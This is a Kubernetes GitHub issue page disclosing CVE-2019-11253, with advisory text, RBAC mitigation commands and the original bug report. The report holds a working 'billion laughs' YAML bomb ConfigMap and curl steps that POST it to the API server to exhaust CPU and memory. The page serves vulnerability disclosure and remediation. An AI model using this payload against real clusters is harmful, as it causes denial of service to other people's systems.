Skip to content

CVE-2019-11253: Kubernetes API Server JSON/YAML parsing vulnerable to resource exhaustion attack #83253

Closed
@raesene

Description

@raesene

CVE-2019-11253 is a denial of service vulnerability in the kube-apiserver, allowing authorized users sending malicious YAML or JSON payloads to cause kube-apiserver to consume excessive CPU or memory, potentially crashing and becoming unavailable. This vulnerability has been given an initial severity of High, with a score of 7.5 (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H).

Prior to v1.14.0, default RBAC policy authorized anonymous users to submit requests that could trigger this vulnerability. Clusters upgraded from a version prior to v1.14.0 keep the more permissive policy by default for backwards compatibility. See the mitigation section below for instructions on how to install the more restrictive v1.14+ policy.

Affected versions:

All four patch releases are now available.

Fixed in master by #83261

Mitigation:

Requests that are rejected by authorization do not trigger the vulnerability, so managing authorization rules and/or access to the Kubernetes API server mitigates which users are able to trigger this vulnerability.

To manually apply the more restrictive v1.14.x+ policy, either as a pre-upgrade mitigation, or as an additional protection for an upgraded cluster, save the attached file as rbac.yaml, and run:

kubectl auth reconcile -f rbac.yaml --remove-extra-subjects --remove-extra-permissions 

Note: this removes the ability for unauthenticated users to use kubectl auth can-i

If you are running a version prior to v1.14.0:

  • in addition to installing the restrictive policy, turn off autoupdate for this clusterrolebinding so your changes aren’t replaced on an API server restart:
    kubectl annotate --overwrite clusterrolebinding/system:basic-user rbac.authorization.kubernetes.io/autoupdate=false
  • after upgrading to v1.14.0 or greater, you can remove this annotation to reenable autoupdate:
    kubectl annotate --overwrite clusterrolebinding/system:basic-user rbac.authorization.kubernetes.io/autoupdate=true

=============

Original description follows:

Introduction

Posting this as an issue following report to the security list who suggested putting it here as it's already public in a Stackoverflow question here

What happened:

When creating a ConfigMap object which has recursive references contained in it, excessive CPU usage can occur. This appears to be an instance of a "Billion Laughs" attack which is quite well known as an XML parsing issue.

Applying this manifest to a cluster causes the client to hang for some time with considerable CPU usage.

apiVersion: v1
data:
  a: &a ["web","web","web","web","web","web","web","web","web"]
  b: &b [*a,*a,*a,*a,*a,*a,*a,*a,*a]
  c: &c [*b,*b,*b,*b,*b,*b,*b,*b,*b]
  d: &d [*c,*c,*c,*c,*c,*c,*c,*c,*c]
  e: &e [*d,*d,*d,*d,*d,*d,*d,*d,*d]
  f: &f [*e,*e,*e,*e,*e,*e,*e,*e,*e]
  g: &g [*f,*f,*f,*f,*f,*f,*f,*f,*f]
  h: &h [*g,*g,*g,*g,*g,*g,*g,*g,*g]
  i: &i [*h,*h,*h,*h,*h,*h,*h,*h,*h]
kind: ConfigMap
metadata:
  name: yaml-bomb
  namespace: default

What you expected to happen:

Ideally it would be good for a maximum size of entity to be defined, or perhaps some limit on recursive references in YAML parsed by kubectl.

One note is that the original poster on Stackoverflow indicated that the resource consumption was in kube-apiserver but both tests I did (1.16 client against 1.15 Kubeadm cluster and 1.16 client against 1.16 kubeadm cluster) showed the CPU usage client-side.

How to reproduce it (as minimally and precisely as possible):

Get the manifest above and apply to a cluster as normal with kubectl create -f <manifest>. Use top or another CPU monitor to observe the quantity of CPU time used.

Anything else we need to know?:

Environment:

  • Kubernetes version (use kubectl version):

test 1 (linux AMD64 client, Kubeadm cluster running in kind)

Client Version: version.Info{Major:"1", Minor:"16", GitVersion:"v1.16.0", GitCommit:"2bd9643cee5b3b3a5ecbd3af49d09018f0773c77", GitTreeState:"clean", BuildDate:"2019-09-18T14:36:53Z", GoVersion:"go1.12.9", Compiler:"gc", Platform:"linux/amd64"}
Server Version: version.Info{Major:"1", Minor:"15", GitVersion:"v1.15.0", GitCommit:"e8462b5b5dc2584fdcd18e6bcfe9f1e4d970a529", GitTreeState:"clean", BuildDate:"2019-06-25T23:41:27Z", GoVersion:"go1.12.5", Compiler:"gc", Platform:"linux/amd64"}

test 2 (Linux AMD64 client, Kubeadm cluster running in VMWare Workstation)

Client Version: version.Info{Major:"1", Minor:"16", GitVersion:"v1.16.0", GitCommit:"2bd9643cee5b3b3a5ecbd3af49d09018f0773c77", GitTreeState:"clean", BuildDate:"2019-09-18T14:36:53Z", GoVersion:"go1.12.9", Compiler:"gc", Platform:"linux/amd64"}
Server Version: version.Info{Major:"1", Minor:"16", GitVersion:"v1.16.0", GitCommit:"2bd9643cee5b3b3a5ecbd3af49d09018f0773c77", GitTreeState:"clean", BuildDate:"2019-09-18T14:27:17Z", GoVersion:"go1.12.9", Compiler:"gc", Platform:"linux/amd64"}

Activity

added
kind/bugCategorizes issue or PR as related to a bug.
on Sep 27, 2019
added
needs-sigIndicates an issue or PR lacks a `sig/foo` label and requires one.
on Sep 27, 2019
raesene

raesene commented on Sep 27, 2019

@raesene
Author

/sig cli

added
sig/cliCategorizes an issue or PR as relevant to SIG CLI.
and removed
needs-sigIndicates an issue or PR lacks a `sig/foo` label and requires one.
on Sep 27, 2019
added
sig/api-machineryCategorizes an issue or PR as relevant to SIG API Machinery.
priority/important-soonMust be staffed and worked on either currently, or very soon, ideally in time for the next release.
and removed
sig/cliCategorizes an issue or PR as relevant to SIG CLI.
on Sep 27, 2019
raesene

raesene commented on Sep 27, 2019

@raesene
Author

To update based on ideas from @liggitt and @bgeesaman , it's also possible to use this issue to cause a denial of service to the kube-apiserver by using curl to POST the YAML directly to the API server, effectively bypassing the client-side processing.

Steps to reproduce.

  1. Save the YAML as a file called yaml_bomb.yml
  2. for a valid kubernetes cluster, run kubectl proxy
  3. from the directory with the YAML saved run curl -X POST http://127.0.0.1:8001/api/v1/namespaces/default/configmaps -H "Content-Type: application/yaml" --data-binary @yaml_bomb.yml
  4. If your user has rights to create ConfigMap objects in the default namespaces, this should work
  5. Observe CPU/Memory usage in the API server(s) of the target cluster.
changed the title [-]Kubectl YAML parsing vulnerable to "Billion Laughs" Attack.[/-] [+]Kubectl/API Server YAML parsing vulnerable to "Billion Laughs" Attack.[/+] on Sep 27, 2019
self-assigned this
on Sep 27, 2019
jbeda

jbeda commented on Sep 27, 2019

@jbeda
Contributor

Just saw this -- we should stop accepting yaml server side. Or have a "simple yaml" variant that gets rid of references.

Any real world usages of users sending yaml to the api server? Can we go JSON/proto only?

mauilion

mauilion commented on Sep 27, 2019

@mauilion

Nice find!

102 remaining items

PushkarJ

PushkarJ commented on Oct 14, 2022

@PushkarJ
Member

/label official-cve-feed

(Related to kubernetes/sig-security#1)

added
official-cve-feedIssues or PRs related to CVEs officially announced by Security Response Committee (SRC)
on Oct 14, 2022
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Metadata

Metadata

Assignees

Labels

area/apiserverarea/client-librariesarea/securitykind/bugCategorizes issue or PR as related to a bug.official-cve-feedIssues or PRs related to CVEs officially announced by Security Response Committee (SRC)priority/critical-urgentHighest priority. Must be actively worked on as someone's top priority right now.sig/api-machineryCategorizes an issue or PR as relevant to SIG API Machinery.

Type

No type

Projects

No projects

Relationships

None yet

    Development

    Participants

    @dims@jbeda@raesene@anguslees@liggitt

    Issue actions

      CVE-2019-11253: Kubernetes API Server JSON/YAML parsing vulnerable to resource exhaustion attack · Issue #83253 · kubernetes/kubernetes